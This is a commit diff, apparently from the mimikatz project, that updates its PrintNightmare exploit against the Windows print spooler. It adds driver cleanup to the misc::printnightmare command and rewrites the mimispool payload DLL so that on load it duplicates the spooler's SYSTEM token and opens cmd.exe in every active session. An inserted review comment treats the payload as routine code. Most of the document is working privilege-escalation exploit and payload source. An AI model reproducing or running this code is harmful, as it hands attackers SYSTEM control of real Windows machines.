[new] mimispool module to support PrintNightmare 2.x and 4.x
[new] mimispool module now tries to pop a SYSTEM cmd on all active desktops [new] mimikatz misc::printnightmare tries to clean the temporary printer driver (not available by default on remote ones)
This commit is contained in:
parent
2a5b839224
commit
247da32854
@ -1658,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
|
||||
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
{
|
||||
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
|
||||
|
||||
@ -1669,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
|
||||
{
|
||||
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
|
||||
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
|
||||
{
|
||||
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
|
||||
{
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
|
||||
}
|
||||
}
|
||||
|
||||
LocalFree(DriverInfo.pDataFile);
|
||||
LocalFree(DriverInfo.pDriverPath);
|
||||
@ -1693,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
LPCWSTR szPtr;
|
||||
@ -1710,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
if(!bIsPar)
|
||||
{
|
||||
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
}
|
||||
}
|
||||
|
||||
if(status)
|
||||
@ -1811,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
|
||||
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
|
||||
{
|
||||
DWORD i, ret, cReturned = 0;
|
||||
DWORD i, cReturned = 0;
|
||||
_PDRIVER_INFO_2 pDriverInfo;
|
||||
PWSTR pName, pConfig;
|
||||
|
||||
@ -1828,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
{
|
||||
if(pName == wcsstr(pName, MIMIKATZ L"-"))
|
||||
{
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1858,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
DRIVER_CONTAINER container_info;
|
||||
|
||||
@ -1882,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
@ -1889,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
|
||||
|
@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
|
||||
|
||||
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
|
@ -5,48 +5,36 @@
|
||||
*/
|
||||
#include "mimispool.h"
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL ret = TRUE;
|
||||
|
||||
switch( ul_reason_for_call )
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
|
||||
ret = FALSE;
|
||||
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
|
||||
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
|
||||
break;
|
||||
UNREFERENCED_PARAMETER(hinstDLL);
|
||||
UNREFERENCED_PARAMETER(lpReserved);
|
||||
|
||||
case DLL_THREAD_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
|
||||
break;
|
||||
if (fdwReason == DLL_PROCESS_ATTACH)
|
||||
{
|
||||
RunProcessForAll(L"cmd.exe");
|
||||
}
|
||||
|
||||
case DLL_THREAD_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
|
||||
break;
|
||||
|
||||
case DLL_PROCESS_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
|
||||
break;
|
||||
}
|
||||
|
||||
return ret;
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if ( dwMode == DRVQUERY_USERMODE)
|
||||
if (dwMode == DRVQUERY_USERMODE)
|
||||
{
|
||||
*pcbNeeded = sizeof(DWORD);
|
||||
if (pBuffer && (cbBuf >= sizeof(DWORD)))
|
||||
{
|
||||
status = TRUE;
|
||||
*(DWORD *)pBuffer = TRUE;
|
||||
*(DWORD*)pBuffer = TRUE;
|
||||
}
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
}
|
||||
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
if ((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
{
|
||||
SetLastError(ERROR_BAD_DRIVER_LEVEL);
|
||||
}
|
||||
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
|
||||
|
||||
VOID APIENTRY DrvDisableDriver()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
;
|
||||
}
|
||||
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
}
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
void kspool(LPCWSTR szFrom)
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
FILE * kspool_logfile;
|
||||
WCHAR Buffer[256 + 1];
|
||||
DWORD cbBuffer = ARRAYSIZE(Buffer);
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4996)
|
||||
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
|
||||
#pragma warning(pop)
|
||||
{
|
||||
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
|
||||
fclose(kspool_logfile);
|
||||
}
|
||||
}
|
||||
|
||||
void klog(FILE * logfile, PCWCHAR format, ...)
|
||||
{
|
||||
if(logfile)
|
||||
{
|
||||
va_list args;
|
||||
va_start(args, format);
|
||||
vfwprintf(logfile, format, args);
|
||||
va_end(args);
|
||||
fflush(logfile);
|
||||
}
|
||||
}
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszDirectory);
|
||||
UNREFERENCED_PARAMETER(pSplClientInfo);
|
||||
UNREFERENCED_PARAMETER(dwLevel);
|
||||
UNREFERENCED_PARAMETER(pszSourceDir);
|
||||
UNREFERENCED_PARAMETER(pcchSourceDirSize);
|
||||
UNREFERENCED_PARAMETER(pszTargetDir);
|
||||
UNREFERENCED_PARAMETER(pcchTargetDirSize);
|
||||
UNREFERENCED_PARAMETER(dwFlags);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszKey);
|
||||
UNREFERENCED_PARAMETER(dwCopyFileEvent);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
STARTUPINFO si = { 0 };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
HANDLE hToken, hNewToken;
|
||||
DWORD i, count;
|
||||
LPVOID Environment;
|
||||
PSESSIONIDW sessions;
|
||||
|
||||
si.cb = sizeof(si);
|
||||
si.lpDesktop = L"winsta0\\default";
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
{
|
||||
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
|
||||
{
|
||||
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
|
||||
{
|
||||
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
|
||||
{
|
||||
for (i = 0; i < count; i++)
|
||||
{
|
||||
if (sessions[i].State == State_Active)
|
||||
{
|
||||
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
|
||||
{
|
||||
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
|
||||
{
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(pi.hProcess);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (sessions)
|
||||
{
|
||||
WinStationFreeMemory(sessions);
|
||||
}
|
||||
}
|
||||
DestroyEnvironmentBlock(Environment);
|
||||
}
|
||||
CloseHandle(hNewToken);
|
||||
}
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
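Review bot: `RunProcessForAll` declares `BOOL status = FALSE;` and never assigns it again, so every path returns FALSE and the BOOL return value tells the caller nothing; either set `status = TRUE;` inside the `CreateProcessAsUser` success branch (next to the two `CloseHandle` calls) or make the function `void` and change the prototype in the header to match. The rewritten `DllMain` drops the comment that explained why the old build returned FALSE and now returns TRUE with no explanation; a one-line comment such as `// TRUE keeps the library resident (the previous build returned FALSE so it unloaded immediately)` would preserve that rationale for the next reader. The `DLL_PROCESS_ATTACH` branch also discards `RunProcessForAll`'s result, which is harmless while it is always FALSE but will silently mask failures once the return value becomes meaningful.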
@ -1,10 +1,11 @@
|
||||
LIBRARY
|
||||
EXPORTS
|
||||
; PrintNightMare 2.x - via config file and/or "real driver"
|
||||
DrvResetConfigCache
|
||||
DrvQueryDriverInfo
|
||||
DrvEnableDriver
|
||||
DrvDisableDriver
|
||||
|
||||
DrvResetConfigCache
|
||||
|
||||
; PrintNightMare 4.x - via CopyFiles
|
||||
GenerateCopyFilePaths
|
||||
SpoolerCopyFileEvent
|
@ -5,35 +5,75 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <userenv.h>
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
|
||||
#define PLATFORM L"x64"
|
||||
#elif defined(_M_IX86)
|
||||
#define PLATFORM L"x86"
|
||||
#endif
|
||||
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
|
||||
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
|
||||
|
||||
typedef LONG_PTR (APIENTRY *PFN)();
|
||||
#define LOGONID_CURRENT ((ULONG) -1)
|
||||
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
|
||||
#define MAX_THINWIRECACHE 4
|
||||
#define WINSTATIONNAME_LENGTH 32
|
||||
#define DOMAIN_LENGTH 17
|
||||
#define USERNAME_LENGTH 20
|
||||
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
|
||||
|
||||
typedef enum _WINSTATIONSTATECLASS {
|
||||
State_Active = 0,
|
||||
State_Connected = 1,
|
||||
State_ConnectQuery = 2,
|
||||
State_Shadow = 3,
|
||||
State_Disconnected = 4,
|
||||
State_Idle = 5,
|
||||
State_Listen = 6,
|
||||
State_Reset = 7,
|
||||
State_Down = 8,
|
||||
State_Init = 9
|
||||
} WINSTATIONSTATECLASS;
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4201)
|
||||
typedef struct _SESSIONIDW {
|
||||
union {
|
||||
ULONG SessionId;
|
||||
ULONG LogonId;
|
||||
} DUMMYUNIONNAME;
|
||||
WINSTATIONNAME WinStationName;
|
||||
WINSTATIONSTATECLASS State;
|
||||
} SESSIONIDW, * PSESSIONIDW;
|
||||
#pragma warning(pop)
|
||||
|
||||
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
|
||||
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
|
||||
|
||||
typedef LONG_PTR(APIENTRY* PFN)();
|
||||
|
||||
typedef struct _DRVFN {
|
||||
ULONG iFunc;
|
||||
PFN pfn;
|
||||
} DRVFN, *PDRVFN;
|
||||
} DRVFN, * PDRVFN;
|
||||
|
||||
typedef struct tagDRVENABLEDATA {
|
||||
ULONG iDriverVersion;
|
||||
ULONG c;
|
||||
DRVFN *pdrvfn;
|
||||
} DRVENABLEDATA, *PDRVENABLEDATA;
|
||||
DRVFN* pdrvfn;
|
||||
} DRVENABLEDATA, * PDRVENABLEDATA;
|
||||
|
||||
#define DRVQUERY_USERMODE 1
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
|
||||
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
|
||||
|
||||
void kspool(LPCWSTR szFrom);
|
||||
void klog(FILE * logfile, PCWCHAR format, ...);
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache();
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
|
||||
VOID APIENTRY DrvDisableDriver();
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess);
|
@ -79,7 +79,7 @@
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<AssemblyDebug>false</AssemblyDebug>
|
||||
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<DataExecutionPrevention>true</DataExecutionPrevention>
|
||||
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
|
||||
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
|
||||
|
@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|
||||
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
|
||||
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
|
||||
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
|